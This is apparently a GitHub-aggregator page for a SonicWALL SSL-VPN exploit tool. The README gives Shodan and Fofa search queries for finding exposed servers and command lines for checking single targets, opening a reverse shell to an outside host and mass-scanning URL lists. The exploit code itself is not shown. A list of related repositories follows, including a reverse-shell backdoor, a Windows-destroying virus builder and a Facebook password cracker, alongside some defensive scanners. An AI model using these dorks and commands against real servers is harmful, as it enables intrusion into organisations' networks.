SonicWALL SSL-VPN Web Server Vulnerable Exploit

Last update: Nov 15, 2022

Overview

SonicWall_SSL-VPN_EXP

SonicWALL SSL-VPN Web Server Vulnerable Exploit

Dork

Shodan:

http.favicon.hash:-1153950306

http.favicon.hash:-2012355198

Fofa:

(body="login_box_sonicwall" || header="SonicWALL SSL-VPN Web Server") && body="SSL-VPN"

Usage

vulnerability verification for individual websites

python POC.py -u https://1.1.1.1

reverse shell to your VPS host

python POC.py -e https://1.1.1.1 -rh 2.2.2.2 -rp 9999

perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file

python3 POC.py -f urls.txt

Reference

https://twitter.com/chybeta/status/1353974652540882944

https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

Owner

GitHub Repository

Suricata Language Server is an implementation of the Language Server Protocol for Suricata signatures

Suricata Language Server is an implementation of the Language Server Protocol for Suricata signatures. It adds syntax check, hints and auto-completion to your preferred editor once it is configured.

39 Nov 28, 2022

Local server for IDA Lumina feature

About POC of an offline server for IDA Lumina feature.

166 Dec 30, 2022

Patching - Interactive Binary Patching for IDA Pro

Patching - Interactive Binary Patching for IDA Pro Overview Patching assembly code to change the behavior of an existing program is not uncommon in ma

589 Dec 30, 2022

A signature parser for hikari's command handler tanjun.

tanchi A signature parser for hikari's command handler tanjun. Finally be able to define your commands without those bloody decorator chains! Example

11 Nov 17, 2022

Dahua IPC/VTH/VTO devices auth bypass exploit

CVE-2021-33044 Dahua IPC/VTH/VTO devices auth bypass exploit About: The identity authentication bypass vulnerability found in some Dahua products duri

23 Dec 02, 2022

A TCP Backdoor made in python

Tracey-Backdoor A Reverse Shell Backdoor made in python OOP. It supposed to work in Windows and Linux OS Functions: Reverse Connection Send Reverse TC

13 Oct 15, 2022

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

DirBruter DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by laun

12 Dec 17, 2022

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

About Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Changed from sam-the-admin. Usage SAM THE ADMIN CVE-202

500 Jan 06, 2023

Virus-Builder - This tool will generate a virus that can only destroy Windows computer

Virus-Builder - This tool will generate a virus that can only destroy Windows computer. You can also configure to auto run in usb drive

16 Dec 30, 2022

Tool to scan for RouterOS (Mikrotik) forensic artifacts and vulnerabilities.

RouterOS Scanner Forensics tool for Mikrotik devices. Search for suspicious properties and weak security points that need to be fixed on the router. T

823 Dec 21, 2022

Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

1 Dec 15, 2021

Searches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances of log4j library, including embedded (jar/war/zip) packaged ones.

33 Jan 04, 2023

This is a multi-password‌ cracking tool that can help you hack facebook accounts very quickly

Pro_Crack Facebook Fast Cracking Tool This is a multi-password‌ cracking tool that can help you hack facebook accounts very quickly Installation On Te

1 Jan 16, 2022

SonicWALL SSL-VPN Web Server Vulnerable Exploit

Related tags

Overview

SonicWall_SSL-VPN_EXP

Dork

Usage

Reference

Owner

Suricata Language Server is an implementation of the Language Server Protocol for Suricata signatures

Local server for IDA Lumina feature

Patching - Interactive Binary Patching for IDA Pro

A signature parser for hikari's command handler tanjun.

Dahua IPC/VTH/VTO devices auth bypass exploit

A TCP Backdoor made in python

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Virus-Builder - This tool will generate a virus that can only destroy Windows computer

Tool to scan for RouterOS (Mikrotik) forensic artifacts and vulnerabilities.

Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

Python library to remotely extract credentials on a set of hosts.

A kAFL based hypervisor fuzzer which fully supports nested VMs

The Modern Hash Identification System

A traceroute tool that also displays IP information

Unauthenticated Sqlinjection that leads to dump data base but this one impersonated Admin and drops a interactive shell

Scan publicly accessible assets on your AWS cloud environment

Glass是一款针对资产列表的快速指纹识别工具，通过调用Fofa/ZoomEye/Shodan/360等api接口

Searches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances of log4j library, including embedded (jar/war/zip) packaged ones.

This is a multi-password‌ cracking tool that can help you hack facebook accounts very quickly